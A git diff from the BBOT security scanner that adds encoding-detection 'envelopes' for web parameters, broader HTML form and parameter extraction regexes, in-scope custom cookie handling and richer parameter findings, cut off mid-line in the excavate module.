diff --git a/README.md b/README.md index ee5790ee5d..b979a1b6ee 100644 --- a/README.md +++ b/README.md @@ -383,6 +383,7 @@ For details, see [Configuration](https://www.blacklanternsecurity.com/bbot/Stabl - [List of Modules](https://www.blacklanternsecurity.com/bbot/Stable/modules/list_of_modules) - [Nuclei](https://www.blacklanternsecurity.com/bbot/Stable/modules/nuclei) - [Custom YARA Rules](https://www.blacklanternsecurity.com/bbot/Stable/modules/custom_yara_rules) + - [Lightfuzz](https://www.blacklanternsecurity.com/bbot/Stable/modules/lightfuzz) - **Misc** - [Contribution](https://www.blacklanternsecurity.com/bbot/Stable/contribution) - [Release History](https://www.blacklanternsecurity.com/bbot/Stable/release_history) diff --git a/bbot/core/event/base.py b/bbot/core/event/base.py index f669c65ff7..3c22364d29 100644 --- a/bbot/core/event/base.py +++ b/bbot/core/event/base.py @@ -9,9 +9,9 @@ import ipaddress import traceback -from copy import copy from pathlib import Path from typing import Optional +from copy import copy, deepcopy from contextlib import suppress from radixtarget import RadixTarget from pydantic import BaseModel, field_validator @@ -40,6 +40,7 @@ validators, get_file_extension, ) +from bbot.core.helpers.web.envelopes import BaseEnvelope log = logging.getLogger("bbot.core.event") @@ -589,6 +590,10 @@ def parent(self, parent): elif not self._dummy: log.warning(f"Tried to set invalid parent on {self}: (got: {parent})") + @property + def children(self): + return [] + @property def parent_id(self): parent_id = getattr(self.get_parent(), "id", None) @@ -643,6 +648,13 @@ def get_parents(self, omit=False, include_self=False): e = parent return parents + def clone(self): + # Create a shallow copy of the event first + cloned_event = copy(self) + # Re-assign a new UUID + cloned_event._uuid = uuid.uuid4() + return cloned_event + def _host(self): return "" @@ -824,7 +836,13 @@ def json(self, mode="json", siem_friendly=False): j["discovery_path"] = self.discovery_path j["parent_chain"] = self.parent_chain + # parameter envelopes + parameter_envelopes = getattr(self, "envelopes", None) + if parameter_envelopes is not None: + j["envelopes"] = parameter_envelopes.to_dict() + # normalize non-primitive python objects + for k, v in list(j.items()): if k == "data": continue @@ -1307,12 +1325,56 @@ class URL_HINT(URL_UNVERIFIED): class WEB_PARAMETER(DictHostEvent): + @property + def children(self): + # if we have any subparams, raise a new WEB_PARAMETER for each one + children = [] + envelopes = getattr(self, "envelopes", None) + if envelopes is not None: + subparams = sorted(list(self.envelopes.get_subparams())) + + if envelopes.selected_subparam is None: + current_subparam = subparams[0] + envelopes.selected_subparam = current_subparam[0] + if len(subparams) > 1: + for subparam, _ in subparams[1:]: + clone = self.clone() + clone.envelopes = deepcopy(envelopes) + clone.envelopes.selected_subparam = subparam + clone.parent = self + children.append(clone) + return children + + def sanitize_data(self, data): + original_value = data.get("original_value", None) + if original_value is not None: + try: + envelopes = BaseEnvelope.detect(original_value) + setattr(self, "envelopes", envelopes) + except ValueError as e: + log.verbose(f"Error detecting envelopes for {self}: {e}") + return data + def _data_id(self): # dedupe by url:name:param_type url = self.data.get("url", "") name = self.data.get("name", "") param_type = self.data.get("type", "") - return f"{url}:{name}:{param_type}" + envelopes = getattr(self, "envelopes", "") + subparam = getattr(envelopes, "selected_subparam", "") + + return f"{url}:{name}:{param_type}:{subparam}" + + def _outgoing_dedup_hash(self, event): + return hash( + ( + str(event.host), + event.data["url"], + event.data.get("name", ""), + event.data.get("type", ""), + event.data.get("envelopes", ""), + ) + ) def _url(self): return self.data["url"] @@ -1730,7 +1792,6 @@ def make_event( data = net.network_address event_class = globals().get(event_type, DefaultEvent) - return event_class( data, event_type=event_type, @@ -1790,7 +1851,6 @@ def event_from_json(j, siem_friendly=False): resolved_hosts = j.get("resolved_hosts", []) event._resolved_hosts = set(resolved_hosts) - event.timestamp = datetime.datetime.fromisoformat(j["timestamp"]) event.scope_distance = j["scope_distance"] parent_id = j.get("parent", None) diff --git a/bbot/core/helpers/diff.py b/bbot/core/helpers/diff.py index ea7ca3a864..73f3adef12 100644 --- a/bbot/core/helpers/diff.py +++ b/bbot/core/helpers/diff.py @@ -15,22 +15,24 @@ def __init__( parent_helper, method="GET", data=None, + json=None, allow_redirects=False, include_cache_buster=True, headers=None, cookies=None, - timeout=15, + timeout=10, ): self.parent_helper = parent_helper self.baseline_url = baseline_url self.include_cache_buster = include_cache_buster self.method = method self.data = data + self.json = json self.allow_redirects = allow_redirects self._baselined = False self.headers = headers self.cookies = cookies - self.timeout = 15 + self.timeout = 10 @staticmethod def merge_dictionaries(headers1, headers2): @@ -53,6 +55,7 @@ async def _baseline(self): follow_redirects=self.allow_redirects, method=self.method, data=self.data, + json=self.json, headers=self.headers, cookies=self.cookies, retries=2, @@ -76,6 +79,7 @@ async def _baseline(self): follow_redirects=self.allow_redirects, method=self.method, data=self.data, + json=self.json, retries=2, timeout=self.timeout, ) @@ -103,11 +107,9 @@ async def _baseline(self): for k in ddiff.keys(): for x in list(ddiff[k]): - log.debug(f"Added {k} filter for path: {x.path()}") self.ddiff_filters.append(x.path()) self.baseline_json = baseline_1_json - self.baseline_ignore_headers = [ h.lower() for h in [ @@ -158,7 +160,6 @@ def compare_body(self, content_1, content_2): if len(ddiff.keys()) == 0: return True else: - log.debug(ddiff) return False async def compare( @@ -169,6 +170,7 @@ async def compare( check_reflection=False, method="GET", data=None, + json=None, allow_redirects=False, timeout=None, ): @@ -199,6 +201,7 @@ async def compare( follow_redirects=allow_redirects, method=method, data=data, + json=json, timeout=timeout, ) diff --git a/bbot/core/helpers/helper.py b/bbot/core/helpers/helper.py index 78ccf67155..a953746807 100644 --- a/bbot/core/helpers/helper.py +++ b/bbot/core/helpers/helper.py @@ -129,7 +129,8 @@ def http_compare( cookies=None, method="GET", data=None, - timeout=15, + json=None, + timeout=10, ): return HttpCompare( url, @@ -141,6 +142,7 @@ def http_compare( timeout=timeout, method=method, data=data, + json=json, ) def temp_filename(self, extension=None): diff --git a/bbot/core/helpers/misc.py b/bbot/core/helpers/misc.py index 92c9e523fd..688f9f599c 100644 --- a/bbot/core/helpers/misc.py +++ b/bbot/core/helpers/misc.py @@ -2,13 +2,16 @@ import sys import copy import json +import math import random import string import asyncio import logging import ipaddress +import ahocorasick import regex as re import subprocess as sp + from pathlib import Path from contextlib import suppress from unidecode import unidecode # noqa F401 @@ -797,17 +800,14 @@ def recursive_decode(data, max_depth=5): return data -rand_pool = string.ascii_lowercase -rand_pool_digits = rand_pool + string.digits - - -def rand_string(length=10, digits=True): +def rand_string(length=10, digits=True, numeric_only=False): """ Generates a random string of specified length. Args: length (int, optional): The length of the random string. Defaults to 10. digits (bool, optional): Whether to include digits in the string. Defaults to True. + numeric_only (bool, optional): Whether to generate a numeric-only string. Defaults to False. Returns: str: A random string of the specified length. @@ -819,11 +819,17 @@ def rand_string(length=10, digits=True): 'ap4rsdtg5iw7ey7y3oa5' >>> rand_string(30, digits=False) 'xdmyxtglqfzqktngkesyulwbfrihva' + >>> rand_string(15, numeric_only=True) + '934857349857395' """ - pool = rand_pool - if digits: - pool = rand_pool_digits - return "".join([random.choice(pool) for _ in range(int(length))]) + if numeric_only: + pool = string.digits + elif digits: + pool = string.ascii_lowercase + string.digits + else: + pool = string.ascii_lowercase + + return "".join(random.choice(pool) for _ in range(length)) def truncate_string(s, n): @@ -921,6 +927,7 @@ def extract_params_xml(xml_data, compare_mode="getparam"): "getparam": {chr(c) for c in range(33, 127) if chr(c) not in ":/?#[]@!$&'()*+,;="}, "postparam": {chr(c) for c in range(33, 127) if chr(c) not in ":/?#[]@!$&'()*+,;="}, "cookie": {chr(c) for c in range(33, 127) if chr(c) not in '()<>@,;:"/[]?={} \t'}, + "bodyjson": set(chr(c) for c in range(33, 127) if chr(c) not in ":/?#[]@!$&'()*+,;="), } @@ -2772,6 +2779,35 @@ def clean_dict(d, *key_names, fuzzy=False, exclude_keys=None, _prev_key=None): return d +def string_scan(substrings, text, case_insensitive=True): + automaton = ahocorasick.Automaton() + if case_insensitive: + substrings = [s.lower() for s in substrings] + text = text.lower() + for idx, substring in enumerate(substrings): + automaton.add_word(substring, (idx, substring)) + automaton.make_automaton() + found_substrings = [] + for end_index, (insert_order, original_value) in automaton.iter(text): + found_substrings.append(original_value) + return found_substrings + + +def calculate_entropy(data): + """Calculate the Shannon entropy of a byte sequence""" + if not data: + return 0 + frequency = {} + for byte in data: + if byte in frequency: + frequency[byte] += 1 + else: + frequency[byte] = 1 + data_len = len(data) + entropy = -sum((count / data_len) * math.log2(count / data_len) for count in frequency.values()) + return entropy + + top_ports_cache = None @@ -2825,3 +2861,15 @@ def clean_requirement(req_string): dist = distribution("bbot") return [clean_requirement(r) for r in dist.requires] + + +def is_printable(s): + """ + Check if a string is printable + """ + if not isinstance(s, str): + raise ValueError(f"Expected a string, got {type(s)}") + + # Exclude control characters that break display/printing + s = set(s) + return all(ord(c) >= 32 or c in "\t\n\r" for c in s) diff --git a/bbot/core/helpers/regexes.py b/bbot/core/helpers/regexes.py index adf8abb650..8e162a3262 100644 --- a/bbot/core/helpers/regexes.py +++ b/bbot/core/helpers/regexes.py @@ -111,25 +111,55 @@ # For use with excavate parameters extractor input_tag_regex = re.compile( - r"]+?name=[\"\']?([\.$\w]+)[\"\']?(?:[^>]*?value=[\"\']([=+\/\w]*)[\"\'])?[^>]*>" + r"]*?\sname=[\"\']?([\-\._=+\/\w]+)[\"\']?[^>]*?\svalue=[\"\']?([:%\-\._=+\/\w]*)[\"\']?[^>]*?>" ) -jquery_get_regex = re.compile(r"url:\s?[\"\'].+?\?(\w+)=") -jquery_post_regex = re.compile(r"\$.post\([\'\"].+[\'\"].+\{(.+)\}") +input_tag_regex2 = re.compile( + r"]*?\svalue=[\"\']?([:\-%\._=+\/\w]*)[\"\']?[^>]*?\sname=[\"\']?([\-\._=+\/\w]+)[\"\']?[^>]*?>" +) +input_tag_novalue_regex = re.compile(r"]*\bvalue=)[^>]*?name=[\"\']?([\-\._=+\/\w]*)[\"\']?[^>]*?>") +input_tag_novalue_regex = re.compile(r"]*\b\svalue=)[^>]*?\sname=[\"\']?([\-\._=+\/\w]*)[\"\']?[^>]*?>") +# jquery_get_regex = re.compile(r"url:\s?[\"\'].+?\?(\w+)=") +# jquery_get_regex = re.compile(r"\$.get\([\'\"].+[\'\"].+\{(.+)\}") +# jquery_post_regex = re.compile(r"\$.post\([\'\"].+[\'\"].+\{(.+)\}") a_tag_regex = re.compile(r"]*href=[\"\']([^\"\'?>]*)\?([^&\"\'=]+)=([^&\"\'=]+)") img_tag_regex = re.compile(r"]*src=[\"\']([^\"\'?>]*)\?([^&\"\'=]+)=([^&\"\'=]+)") get_form_regex = re.compile( - r"]+(?:action=[\"']?([^\s\'\"]+)[\"\']?)?[^>]*method=[\"']?[gG][eE][tT][\"']?[^>]*>([\s\S]*?)<\/form>", + r"]*\bmethod=[\"']?[gG][eE][tT][\"']?[^>]*\baction=[\"']?([^\s\"'<>]+)[\"']?[^>]*>([\s\S]*?)<\/form>", + re.DOTALL, +) +get_form_regex2 = re.compile( + r"]*\baction=[\"']?([^\s\"'<>]+)[\"']?[^>]*\bmethod=[\"']?[gG][eE][tT][\"']?[^>]*>([\s\S]*?)<\/form>", re.DOTALL, ) post_form_regex = re.compile( - r"]+(?:action=[\"']?([^\s\'\"]+)[\"\']?)?[^>]*method=[\"']?[pP][oO][sS][tT][\"']?[^>]*>([\s\S]*?)<\/form>", + r"]*\bmethod=[\"']?[pP][oO][sS][tT][\"']?[^>]*\baction=[\"']?([^\s\"'<>]+)[\"']?[^>]*>([\s\S]*?)<\/form>", + re.DOTALL, +) +post_form_regex2 = re.compile( + r"]*\baction=[\"']?([^\s\"'<>]+)[\"']?[^>]*\bmethod=[\"']?[pP][oO][sS][tT][\"']?[^>]*>([\s\S]*?)<\/form>", + re.DOTALL, +) +post_form_regex_noaction = re.compile( + r"]*(?:\baction=[\"']?([^\s\"'<>]+)[\"']?)?[^>]*\bmethod=[\"']?[pP][oO][sS][tT][\"']?[^>]*>([\s\S]*?)<\/form>", re.DOTALL, ) +generic_form_regex = re.compile( + r"]*\bmethod=)[^>]+(?:\baction=[\"']?([^\s\"'<>]+)[\"']?)[^>]*>([\s\S]*?)<\/form>", re.IGNORECASE | re.DOTALL +) + select_tag_regex = re.compile( - r"]+?name=[\"\']?(\w+)[\"\']?[^>]*>(?:\s*]*?value=[\"\'](\w*)[\"\']?[^>]*>)?" + r"]+?name=[\"\']?([_\-\.\w]+)[\"\']?[^>]*>(?:\s*]*?value=[\"\']?([_\.\-\w]*)[\"\']?[^>]*>)?", re.IGNORECASE | re.DOTALL ) + textarea_tag_regex = re.compile( - r']*\bname=["\']?(\w+)["\']?[^>]*>(.*?)', re.IGNORECASE | re.DOTALL + r']*\bname=["\']?([_\-\.\w]+)["\']?[^>]*>(.*?)', re.IGNORECASE | re.DOTALL +) + +button_tag_regex = re.compile( + r"]*?name=[\"\']?([\-\._=+\/\w]+)[\"\']?[^>]*?value=[\"\']?([%\-\._=+\/\w]*)[\"\']?[^>]*?>" +) +button_tag_regex2 = re.compile( + r"]*?value=[\"\']?([\-%\._=+\/\w]*)[\"\']?[^>]*?name=[\"\']?([\-\._=+\/\w]+)[\"\']?[^>]*?>" ) tag_attribute_regex = re.compile(r"<[^>]*(?:href|action|src)\s*=\s*[\"\']?(?!mailto:)([^\s\'\"\>]+)[\"\']?[^>]*>") diff --git a/bbot/core/helpers/url.py b/bbot/core/helpers/url.py index 5482e54c51..91c7d8a01b 100644 --- a/bbot/core/helpers/url.py +++ b/bbot/core/helpers/url.py @@ -32,7 +32,10 @@ def parse_url(url): return urlparse(url) -def add_get_params(url, params): +def add_get_params(url, params, encode=True): + def _no_encode_quote(s, safe="/", encoding=None, errors=None): + return s + """ Add or update query parameters to the given URL. @@ -53,10 +56,23 @@ def add_get_params(url, params): >>> add_get_params('https://www.evilcorp.com?foo=1', {'foo': 2}) ParseResult(scheme='https', netloc='www.evilcorp.com', path='', params='', query='foo=2', fragment='') """ - parsed = parse_url(url) - old_params = dict(parse_qs(parsed.query)) - old_params.update(params) - return parsed._replace(query=urlencode(old_params, doseq=True)) + parsed = urlparse(url) + query_params = parsed.query.split("&") + + existing_params = {} + for param in query_params: + if "=" in param: + k, v = param.split("=", 1) + existing_params[k] = v + + existing_params.update(params) + + if encode: + new_query = urlencode(existing_params, doseq=True) + else: + new_query = urlencode(existing_params, doseq=True, quote_via=_no_encode_quote) + + return parsed._replace(query=new_query) def get_get_params(url): diff --git a/bbot/core/helpers/web/client.py b/bbot/core/helpers/web/client.py index 28788e04d9..49ddf532be 100644 --- a/bbot/core/helpers/web/client.py +++ b/bbot/core/helpers/web/client.py @@ -63,11 +63,18 @@ def __init__(self, *args, **kwargs): headers = kwargs.get("headers", None) if headers is None: headers = {} + + # cookies + cookies = kwargs.get("cookies", None) + if cookies is None: + cookies = {} + # user agent user_agent = self._web_config.get("user_agent", "BBOT") if "User-Agent" not in headers: headers["User-Agent"] = user_agent kwargs["headers"] = headers + kwargs["cookies"] = cookies # proxy proxies = self._web_config.get("http_proxy", None) kwargs["proxies"] = proxies @@ -78,10 +85,23 @@ def __init__(self, *args, **kwargs): self._cookies = DummyCookies() def build_request(self, *args, **kwargs): - request = super().build_request(*args, **kwargs) - # add custom headers if the URL is in-scope - # TODO: re-enable this - if self._target.in_scope(str(request.url)): + if args: + url = args[0] + kwargs["url"] = url + url = kwargs["url"] + + target_in_scope = self._target.in_scope(str(url)) + + if target_in_scope: + if not kwargs.get("cookies", None): + kwargs["cookies"] = {} + for ck, cv in self._web_config.get("http_cookies", {}).items(): + if ck not in kwargs["cookies"]: + kwargs["cookies"][ck] = cv + + request = super().build_request(**kwargs) + + if target_in_scope: for hk, hv in self._web_config.get("http_headers", {}).items(): # don't clobber headers if hk not in request.headers: diff --git a/bbot/core/helpers/web/engine.py b/bbot/core/helpers/web/engine.py index 4401a219fd..8ffdbe966f 100644 --- a/bbot/core/helpers/web/engine.py +++ b/bbot/core/helpers/web/engine.py @@ -8,7 +8,7 @@ from contextlib import asynccontextmanager from bbot.core.engine import EngineServer -from bbot.core.helpers.misc import bytes_to_human, human_to_bytes, get_exception_chain +from bbot.core.helpers.misc import bytes_to_human, human_to_bytes, get_exception_chain, truncate_string log = logging.getLogger("bbot.core.helpers.web.engine") @@ -203,6 +203,14 @@ async def _acatch(self, url, raise_error): else: log.trace(f"Error with request to URL: {url}: {e}") log.trace(traceback.format_exc()) + except httpx.InvalidURL as e: + if raise_error: + raise + else: + log.warning( + f"Invalid URL (possibly due to dangerous redirect) on request to : {url}: {truncate_string(e, 200)}" + ) + log.trace(traceback.format_exc()) except ssl.SSLError as e: msg = f"SSL error with request to URL: {url}: {e}" if raise_error: diff --git a/bbot/core/helpers/web/envelopes.py b/bbot/core/helpers/web/envelopes.py new file mode 100644 index 0000000000..c000c5d1c0 --- /dev/null +++ b/bbot/core/helpers/web/envelopes.py @@ -0,0 +1,348 @@ +import json +import base64 +import binascii +import xmltodict +from contextlib import suppress +from urllib.parse import unquote, quote +from xml.parsers.expat import ExpatError + +from bbot.core.helpers.misc import is_printable + + +# TODO: This logic is perfect for extracting params. We should expand it outwards to include other higher-level envelopes: +# - QueryStringEnvelope +# - MultipartFormEnvelope +# - HeaderEnvelope +# - CookieEnvelope +# +# Once we start ingesting HTTP_REQUEST events, this will make them instantly fuzzable + + +class EnvelopeChildTracker(type): + """ + Keeps track of all the child envelope classes + """ + + children = [] + + def __new__(mcs, name, bases, class_dict): + # Create the class + cls = super().__new__(mcs, name, bases, class_dict) + # Don't register the base class itself + if bases and not name.startswith("Base"): # Only register if it has base classes (i.e., is a child) + EnvelopeChildTracker.children.append(cls) + EnvelopeChildTracker.children.sort(key=lambda x: x.priority) + return cls + + +class BaseEnvelope(metaclass=EnvelopeChildTracker): + __slots__ = ["subparams", "selected_subparam", "singleton"] + + # determines the order of the envelope detection + priority = 5 + # whether the envelope is the final format, e.g. raw text/binary + end_format = False + ignore_exceptions = (Exception,) + envelope_classes = EnvelopeChildTracker.children + # transparent envelopes (i.e. TextEnvelope) are not counted as envelopes or included in the finding descriptions + transparent = False + + def __init__(self, s): + unpacked_data = self.unpack(s) + + if self.end_format: + inner_envelope = unpacked_data + else: + inner_envelope = self.detect(unpacked_data) + + self.selected_subparam = None + # if we have subparams, our inner envelope will be a dictionary + if isinstance(inner_envelope, dict): + self.subparams = inner_envelope + self.singleton = False + # otherwise if we just have one value, we make a dictionary with a default key + else: + self.subparams = {"__default__": inner_envelope} + self.singleton = True + + @property + def final_envelope(self): + try: + return self.unpacked_data(recursive=False).final_envelope + except AttributeError: + return self + + @property + def friendly_name(self): + if self.friendly_name: + return self.friendly_name + else: + return self.name + + def pack(self, data=None): + if data is None: + data = self.unpacked_data(recursive=False) + with suppress(AttributeError): + data = data.pack() + return self._pack(data) + + def unpack(self, s): + return self._unpack(s) + + def _pack(self, s): + """ + Encodes the string using the class's unique encoder (adds the outer envelope) + """ + raise NotImplementedError("Envelope.pack() must be implemented") + + def _unpack(self, s): + """ + Decodes the string using the class's unique encoder (removes the outer envelope) + """ + raise NotImplementedError("Envelope.unpack() must be implemented") + + def unpacked_data(self, recursive=True): + try: + unpacked = self.subparams["__default__"] + if recursive: + with suppress(AttributeError): + return unpacked.unpacked_data(recursive=recursive) + return unpacked + except KeyError: + return self.subparams + + @classmethod + def detect(cls, s): + """ + Detects the type of envelope used to encode the packed_data + """ + if not isinstance(s, str): + raise ValueError(f"Invalid data passed to detect(): {s} ({type(s)})") + # if the value is empty, we just return the text envelope + if not s.strip(): + return TextEnvelope(s) + for envelope_class in cls.envelope_classes: + with suppress(*envelope_class.ignore_exceptions): + envelope = envelope_class(s) + if envelope is not False: + return envelope + del envelope + raise Exception(f"No envelope detected for data: '{s}' ({type(s)})") + + def get_subparams(self, key=None, data=None, recursive=True): + if data is None: + data = self.unpacked_data(recursive=recursive) + if key is None: + key = [] + + if isinstance(data, dict): + for k, v in data.items(): + full_key = key + [k] + if isinstance(v, dict): + yield from self.get_subparams(full_key, v) + else: + yield full_key, v + else: + yield [], data + + def get_subparam(self, key=None, recursive=True): + if key is None: + key = self.selected_subparam + envelope = self + if recursive: + envelope = self.final_envelope + data = envelope.unpacked_data(recursive=False) + if key is None: + if envelope.singleton: + key = [] + else: + raise ValueError("No subparam selected") + else: + for segment in key: + data = data[segment] + return data + + def set_subparam(self, key=None, value=None, recursive=True): + envelope = self + if recursive: + envelope = self.final_envelope + + # if there's only one value to set, we can just set it directly + if envelope.singleton: + envelope.subparams["__default__"] = value + return + + # if key isn't specified, use the selected subparam + if key is None: + key = self.selected_subparam + if key is None: + raise ValueError(f"{self} -> {envelope}: No subparam selected") + + data = envelope.unpacked_data(recursive=False) + for segment in key[:-1]: + data = data[segment] + data[key[-1]] = value + + @property + def name(self): + return self.__class__.__name__ + + @property + def num_envelopes(self): + num_envelopes = 0 if self.transparent else 1 + if self.end_format: + return num_envelopes + for envelope in self.subparams.values(): + with suppress(AttributeError): + num_envelopes += envelope.num_envelopes + return num_envelopes + + @property + def summary(self): + if self.transparent: + return "" + self_string = f"{self.friendly_name}" + with suppress(AttributeError): + child_envelope = self.unpacked_data(recursive=False) + child_summary = child_envelope.summary + if child_summary: + self_string += f" -> {child_summary}" + + if self.selected_subparam: + self_string += f" [{'.'.join(self.selected_subparam)}]" + return self_string + + def to_dict(self): + return self.summary + + def __str__(self): + return self.summary + + __repr__ = __str__ + + +class HexEnvelope(BaseEnvelope): + """ + Hexadecimal encoding + """ + + friendly_name = "Hexadecimal-Encoded" + + ignore_exceptions = (ValueError, UnicodeDecodeError) + + def _pack(self, s): + return s.encode().hex() + + def _unpack(self, s): + return bytes.fromhex(s).decode() + + +class B64Envelope(BaseEnvelope): + """ + Base64 encoding + """ + + friendly_name = "Base64-Encoded" + + ignore_exceptions = (binascii.Error, UnicodeDecodeError, ValueError) + + def unpack(self, s): + # it's easy to have a small value that accidentally decodes to base64 + if len(s) < 8 and not s.endswith("="): + raise ValueError("Data is too small to be sure") + return super().unpack(s) + + def _pack(self, s): + return base64.b64encode(s.encode()).decode() + + def _unpack(self, s): + return base64.b64decode(s).decode() + + +class URLEnvelope(BaseEnvelope): + """ + URL encoding + """ + + friendly_name = "URL-Encoded" + + def unpack(self, s): + unpacked = super().unpack(s) + if unpacked == s: + raise Exception("Data is not URL-encoded") + return unpacked + + def _pack(self, s): + return quote(s) + + def _unpack(self, s): + return unquote(s) + + +class TextEnvelope(BaseEnvelope): + """ + Text encoding + """ + + end_format = True + # lowest priority means text is the ultimate fallback + priority = 10 + transparent = True + ignore_exceptions = () + + def _pack(self, s): + return s + + def _unpack(self, s): + if not is_printable(s): + raise ValueError(f"Non-printable data detected in TextEnvelope: '{s}' ({type(s)})") + return s + + +# class BinaryEnvelope(BaseEnvelope): +# """ +# Binary encoding +# """ +# end_format = True + +# def pack(self, s): +# return s + +# def unpack(self, s): +# if is_printable(s): +# raise Exception("Non-binary data detected in BinaryEnvelope") +# return s + + +class JSONEnvelope(BaseEnvelope): + """ + JSON encoding + """ + + friendly_name = "JSON-formatted" + end_format = True + priority = 8 + ignore_exceptions = (json.JSONDecodeError,) + + def _pack(self, s): + return json.dumps(s) + + def _unpack(self, s): + return json.loads(s) + + +class XMLEnvelope(BaseEnvelope): + """ + XML encoding + """ + + friendly_name = "XML-formatted" + end_format = True + priority = 9 + ignore_exceptions = (ExpatError,) + + def _pack(self, s): + return xmltodict.unparse(s) + + def _unpack(self, s): + return xmltodict.parse(s) diff --git a/bbot/core/helpers/web/web.py b/bbot/core/helpers/web/web.py index 6c712e1e3e..273a6da93d 100644 --- a/bbot/core/helpers/web/web.py +++ b/bbot/core/helpers/web/web.py @@ -332,6 +332,7 @@ async def curl(self, *args, **kwargs): curl_command.append("-k") headers = kwargs.get("headers", {}) + cookies = kwargs.get("cookies", {}) ignore_bbot_global_settings = kwargs.get("ignore_bbot_global_settings", False) @@ -344,10 +345,17 @@ async def curl(self, *args, **kwargs): if "User-Agent" not in headers: headers["User-Agent"] = user_agent - # only add custom headers if the URL is in-scope + # only add custom headers / cookies if the URL is in-scope if self.parent_helper.preset.in_scope(url): for hk, hv in self.web_config.get("http_headers", {}).items(): - headers[hk] = hv + # Only add the header if it doesn't already exist in the headers dictionary + if hk not in headers: + headers[hk] = hv + + for ck, cv in self.web_config.get("http_cookies", {}).items(): + # don't clobber cookies + if ck not in cookies: + cookies[ck] = cv # add the timeout if "timeout" not in kwargs: diff --git a/bbot/core/modules.py b/bbot/core/modules.py index c83d34a96f..d5599fa498 100644 --- a/bbot/core/modules.py +++ b/bbot/core/modules.py @@ -104,8 +104,9 @@ def add_module_dir(self, module_dir): def file_filter(self, file): file = file.resolve() - if "templates" in file.parts: - return False + for part in file.parts: + if part.endswith("_submodules") or part == "templates": + return False return file.suffix.lower() == ".py" and file.stem not in ["base", "__init__"] def preload(self, module_dirs=None): diff --git a/bbot/modules/base.py b/bbot/modules/base.py index 48d190f29b..2362983897 100644 --- a/bbot/modules/base.py +++ b/bbot/modules/base.py @@ -528,8 +528,9 @@ async def emit_event(self, *args, **kwargs): if v is not None: emit_kwargs[o] = v event = self.make_event(*args, **event_kwargs) - if event: - await self.queue_outgoing_event(event, **emit_kwargs) + children = event.children + for e in [event] + children: + await self.queue_outgoing_event(e, **emit_kwargs) return event async def _events_waiting(self, batch_size=None): diff --git a/bbot/modules/httpx.py b/bbot/modules/httpx.py index 8edc4e1d69..21fa48d63d 100644 --- a/bbot/modules/httpx.py +++ b/bbot/modules/httpx.py @@ -3,6 +3,8 @@ import tempfile import subprocess from pathlib import Path +from http.cookies import SimpleCookie + from bbot.modules.base import BaseModule @@ -137,8 +139,20 @@ async def handle_batch(self, *events): if self.probe_all_ips: command += ["-probe-all-ips"] + # Add custom HTTP headers for hk, hv in self.scan.custom_http_headers.items(): command += ["-header", f"{hk}: {hv}"] + + # Add custom HTTP cookies as a single header + if self.scan.custom_http_cookies: + cookie = SimpleCookie() + for ck, cv in self.scan.custom_http_cookies.items(): + cookie[ck] = cv + + # Build the cookie header + cookie_header = f"Cookie: {cookie.output(header='', sep='; ').strip()}" + command += ["-header", cookie_header] + proxy = self.scan.http_proxy if proxy: command += ["-http-proxy", proxy] diff --git a/bbot/modules/hunt.py b/bbot/modules/hunt.py index 649eaaa19b..a46bd58c39 100644 --- a/bbot/modules/hunt.py +++ b/bbot/modules/hunt.py @@ -284,11 +284,29 @@ class hunt(BaseModule): async def handle_event(self, event): p = event.data["name"] + matching_categories = [] + + # Collect all matching categories for k in hunt_param_dict.keys(): if p.lower() in hunt_param_dict[k]: - description = f"Found potential {k.upper()} parameter [{p}]" - data = {"host": str(event.host), "description": description} - url = event.data.get("url", "") - if url: - data["url"] = url - await self.emit_event(data, "FINDING", event) + matching_categories.append(k) + + if matching_categories: + # Create a comma-separated string of categories + category_str = ", ".join(matching_categories) + description = f"Found potentially interesting parameter. Name: [{p}] Parameter Type: [{event.data['type']}] Categories: [{category_str}]" + + if ( + "original_value" in event.data.keys() + and event.data["original_value"] != "" + and event.data["original_value"] is not None + ): + description += ( + f" Original Value: [{self.helpers.truncate_string(str(event.data['original_value']), 200)}]" + ) + + data = {"host": str(event.host), "description": description} + url = event.data.get("url", "") + if url: + data["url"] = url + await self.emit_event(data, "FINDING", event) diff --git a/bbot/modules/internal/excavate.py b/bbot/modules/internal/excavate.py index 5fb0fee245..f7a6e3cc66 100644 --- a/bbot/modules/internal/excavate.py +++ b/bbot/modules/internal/excavate.py @@ -300,7 +300,7 @@ class excavateTestRule(ExcavateRule): } options = { - "retain_querystring": False, + "retain_querystring": True, "yara_max_match_data": 2000, "custom_yara_rules": "", } @@ -314,7 +314,9 @@ class excavateTestRule(ExcavateRule): _module_threads = 8 - parameter_blacklist = { + parameter_blacklist_prefix = ["TS01", "BIGipServerpool_"] # Big-IP F5 Persistence Cookies + + parameter_blacklist = set( p.lower() for p in [ "__VIEWSTATE", @@ -328,14 +330,25 @@ class excavateTestRule(ExcavateRule): "ASP.NET_SessionId", "JSESSIONID", "PHPSESSID", + "AWSALB", + "AWSALBCORS", ] - } + ) yara_rule_name_regex = re.compile(r"rule\s(\w+)\s{") yara_rule_regex = re.compile(r"(?s)((?:rule\s+\w+\s*{[^{}]*(?:{[^{}]*}[^{}]*)*[^{}]*(?:/\S*?}[^/]*?/)*)*})") def in_bl(self, value): - return value.lower() in self.parameter_blacklist + lower_value = value.lower() + + if lower_value in self.parameter_blacklist: + return True + + for bl_param_prefix in self.parameter_blacklist_prefix: + if lower_value.startswith(bl_param_prefix.lower()): + return True + + return False def url_unparse(self, param_type, parsed_url): if param_type == "GETPARAM": @@ -391,7 +404,7 @@ def extract(self): yield ( self.output_type, parameter_name, - original_value, + original_value.strip(), action, _exclude_key(extracted_parameters_dict, parameter_name), ) @@ -404,7 +417,7 @@ class PostJquery(GetJquery): class HtmlTags(ParameterExtractorRule): name = "HTML Tags" - discovery_regex = r'/<[^>]+(href|src)=["\'][^"\']*["\'][^>]*>/ nocase' + discovery_regex = r'/<[^>]+(href|src|action)=["\']?[^"\'>\s]*["\']?[^>]*>/ nocase' extraction_regex = bbot_regexes.tag_attribute_regex output_type = "GETPARAM" @@ -412,48 +425,119 @@ def extract(self): urls = self.extraction_regex.findall(str(self.result)) for url in urls: parsed_url = urlparse(url) - query_strings = parse_qs(parsed_url.query) - query_strings_dict = { - k: v[0] if isinstance(v, list) and len(v) == 1 else v for k, v in query_strings.items() - } + query_strings = parse_qs(html.unescape(parsed_url.query)) + query_strings_dict = {k: v[0] if isinstance(v, list) else v for k, v in query_strings.items()} for parameter_name, original_value in query_strings_dict.items(): yield ( self.output_type, parameter_name, - original_value, + original_value.strip(), url, _exclude_key(query_strings_dict, parameter_name), ) + class AjaxJquery(ParameterExtractorRule): + name = "JQuery Extractor" + discovery_regex = 